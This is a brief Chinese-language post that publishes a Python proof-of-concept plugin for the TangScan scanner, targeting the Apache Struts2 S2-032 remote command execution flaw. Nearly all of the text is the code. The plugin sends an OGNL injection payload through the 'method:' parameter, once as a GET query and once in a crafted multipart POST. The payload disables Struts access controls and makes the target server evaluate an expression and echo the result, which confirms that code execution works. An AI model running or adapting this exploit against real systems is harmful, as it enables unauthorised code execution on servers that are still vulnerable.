S2-032 远程命令执行 (POC@Tangscan)

前段时间很火的S2-032 远程命令执行

import re
import string
from StringIO import StringIO
from thirdparty import requests
from modules.exploit import TSExploit
from StringIO import StringIO

class TangScan(TSExploit):
    def __init__(self):
        super(self.__class__, self).__init__()
        self.info = {
            "name": "S2-032 远程命令执行",
            "product": "",
            "product_version": "",
            "desc": """
            S2-032 远程命令执行
            """,
            "license": self.license.TS,
            "author": ["系统"],
            "ref": [
                {self.ref.wooyun: "http://zone.wooyun.org/content/26856"},
            ],
            "type": self.type.rce,
            "severity": self.severity.high,
            "privileged": False,
            "disclosure_date": "",
            "create_date": ""
        }
        self.register_option({
            "url": {
                "default": "",
                "required": True,
                "choices": [],
                "convert": self.convert.url_field,
                "desc": "目标 url"
            }
        })
        self.register_result({
            "status": False,
            "data": {

            },
            "description": "",
            "error": ""
        })

    def verify(self):
        exp_url = self.option.url + "?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23w%3d%23context.get(%23parameters.rpsobj[0]),%23w.getWriter().println(88888888-1),%23w.getWriter().flush(),%23w.getWriter().close(),1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse"
        try:
            r = requests.get(exp_url)
            content = r.content
        except:
            content = ''
        if content.find('88888887') == 0:
            self.result.status = True
            self.result.description = "目标 {url} 存在st2命令执行".format(
            url=self.option.url
        )
        else:
            try:
                headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36'}
                data = {r'reqobj': 'com.opensymphony.xwork2.dispatcher.HttpServletRequest',"rpsobj":"com.opensymphony.xwork2.dispatcher.HttpServletResponse","xxoo":"1"}
                files = {'test': ('1.jpg', StringIO('1'))}
                req = requests.Request('POST', self.option.url, headers=headers, data=data,files=files).prepare()
                
                req.body = req.body.replace('xxoo', r'method:#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#w=#context.get(#parameters.rpsobj[0]),#w.getWriter().println(88888888-1),#w.getWriter().flush(),#w.getWriter().close(),1?#xx:#request.toStringj')
                req.headers['Content-Length'] = len(req.body)
                s = requests.Session()
                reponse = s.send(req, timeout=10, verify=False, allow_redirects=False)

                if reponse.content.find('88888887') == 0:
                    self.result.status = True
                    self.result.description = "目标 {url} 存在st2命令执行".format(
                    url=self.option.url
                )
                
                
            except Exception,e:
                print str(e)
    def exploit(self):
        pass

if __name__ == '__main__':
    from modules.main import main
    main(TangScan())